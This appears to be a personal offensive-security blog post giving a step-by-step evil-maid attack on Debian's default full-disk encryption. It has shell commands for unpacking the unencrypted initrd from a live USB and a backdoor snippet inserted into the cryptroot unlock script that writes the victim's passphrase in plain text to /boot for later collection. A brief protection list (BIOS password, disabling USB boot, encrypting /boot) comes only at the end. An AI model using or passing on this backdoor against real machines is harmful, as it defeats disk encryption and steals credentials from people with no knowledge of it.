Alice Climent-Pommeret
Posts Categories Resume
Alice Climent-Pommeret

Contents

Bypass Disk Encryption Linux

 included in Offensive Security
   825 words   4 minutes 

We are going to learn how to steal the passphrase of a drive encrypted with default setup on a Debian distribution.

How? Through physical intrusion!

The general idea is simple. By default, disk encryption on Debian (and many other distributions) doesn’t encrypt the \boot directory. Even if full disk encyprtion is available via Grub2…

To perform this attack, we are going to use a Live USB on the target machine. Using the live USB, we are going to modify the script asking the passphrase (located in /boot) to make it write, in a text file, the passphrase typed by the victim. Th next time the victim decrypts the disk, the passphrase is written in plain text on a partition accessible by the attacker.

Requirements

  • debian-live on a USB key
  • The ability to boot the target machine on the live usb
  • 2 physical access to the target machine (one to deploy, on to retrieve the plain text passphrase

For this example :

Victim : A debian stretch named “vict” with a disk encrypted with the default setup of the Debian installer. It means that the /boot partition will be unencrypted.

Attacker : A debian-live named “hack” on a USB key

⚠️ In this example initrd.img will be initrd.img-3.16.0-6-amd64. The 3.16.0-6-amd64 part of our file is specific to the kernel version.⚠️

Exploitation

  1. The attacker inserts the USB key “hack” in the “vict” machine.
  2. The attacker boots “vict” on the debian-live “hack”.

If you want to use Azerty :

$ setxkbmap fr

Switch to root #HackTheWorld

sudo -s

Mount the “vict” unencrypted /boot partition in the mnt directory of “hack”

$ mount /dev/sda1 /mnt

Friendly reminder, “vict” is a Debian system.

Go in /mnt and check if the content is coherent with a /boot partition (file/directory like vmlinuz, initrd, grub).

Create a work directory at the file system root.

$ mkdir /work

We are working outside the /boot partition because it’s very limited in space (236Mo).

Copy the file beginning with initrd.img- (in Arch it’s initramfs-linux.img) in the work directory. Make sure to remember the original name of the file you are copying.

$ cp /mnt/initrd.img-3.16.0-6-amd64 /work/

The initrd.img-3.16.0-6-amd64 file is a gzip. To be able to decompress it, rename it by adding the .gz extension in the name:

$ cd /work && mv initrd.img-3.16.0-6-amd64 initrd.img-3.16.0-6-amd64.gz

Decompress it:

$ gzip -d initrd.img-3.16.0-6-amd64.gz

You will get a file named initrd.img-3.16.0-6-amd64. This file is a CPIO archive. Decompress it:

$ cpio -i < initrd.img-3.16.0-6-amd64

Now, you have a minimal file system.

But why? What is this initrd file?

Initrd stands for Initial RamDisk. It’s the file that will be loaded in the RAM at the system boot. This file give the OS a minimalist file system with essentials binaries that allows it to load the main file system.

We need to find the decryption script. To find it, grep a piece of the message displayed when you have to unlock the disk.

$ rgrep "Please unlock disk"

You can have multiple files in the results. If that’s the case, it’s up to you to identify the right one. Here, the righ one is script/local-top/cryptroot.

Open scripts/local-top/cryptroot. Search the pattern “cryptsetup failed, bad password or option?”. Find the beginning of the while loop where the “cryptsetup failed” message is:

 while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do

Right before the while loop, insert:

##HACK BEGIN
zer=$($cryptkeyscript "$cryptkey")
mkdir oklm
mount -t ext2 -o rw /dev/sda1 oklm
echo $zer >> oklm/.kernel_option.tmp
umount oklm
##HACK END

This code writes the passphrase submitted by the victim in .kernel_option.tmp in the /boot partition of “vict”.

Delete the CPIO initrd file decompressed ealier in the /work directory. Create a new CPIO initrd file with the malicious code:

$ find . | cpio -H newc -o > ../initrd.img-3.16.0-6-amd64

Make sure that, in the above command, you used the original CPIO filename.

The new CPIO file will be created outside the work directory.

Compress the new CPIO file in gzip:

$ gzip ../initrd.img-3.16.0-6-amd64

Move in /mnt (the boot partition of “vict”) the new initrd.img-3.16.0-6-amd64.gz file and remove the .gz extension in the file name:

$ mv ../initrd.img-*.gz /mnt/initrd.img-3.16.0-6-amd64

Make sure to remove the extension, to replace the initrd file by the backdoored one.

Unmout /boot mounted in /mnt:

$ cd && umount /mnt

Shutdown the machine.

Post Exploitation

Wait until the victim unlocks at least once their disk then insert the USB key “hack” in the victim’s machine. Boot on “hack” and:

$ mount /dev/sda1 /mnt

Check out the stolen passphrase /mnt/.kernel_option.tmp:

$ cat /mnt/.kernel_option.tmp

Tadam! You have successfully stole a passphrase.

Protection

To protect you against this attack:

  1. Set a BIOS password.
  2. Disable Boot on USB key, CD, network or any outside device.
  3. Encrypt your /boot with Grub2!. There is many tutorial online to do it, but I recommand this one.

Automated tools

Automated versions of this attack exist, one of them is the “Evil Abigal” tool. You can find it here.

Updated on 2021-12-05
 LinuxEncryptionBypassPassphrase
Back | Home